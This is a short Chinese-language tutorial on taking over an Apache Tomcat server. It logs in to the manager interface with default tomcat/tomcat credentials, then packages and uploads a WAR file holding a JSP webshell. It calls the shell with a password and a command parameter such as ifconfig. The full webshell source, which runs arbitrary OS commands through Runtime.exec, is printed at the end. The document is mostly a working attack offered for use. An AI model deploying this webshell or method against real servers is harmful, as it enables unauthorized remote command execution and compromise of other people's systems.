tomcat Getshell

Tomcat是Apache 软件基金会（Apache Software Foundation）的Jakarta 项目中的一个核心项目，由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持，最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现，Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性能稳定，而且免费，因而深受Java 爱好者的喜爱并得到了部分软件开发商的认可，成为目前比较流行的Web 应用服务器。

1.使用弱口令登录tomcat

tomcat  //账号密码相同

2.访问文件上传页面

http://172.16.84.128:8180/manager/html

3.制作war格式木马并上传

jar -cvf 1.war hx.jsp
//1.war为制作完成的马，hx.jsp为jsp一句话

4.访问一句话马

http://172.16.91.128:8180/1/hx.jsp?pwd=pass&i=ifconfig
//pass为连接密码，ifconfig为执行的系统命令

5.jsp马分享

<%
    if("pass".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>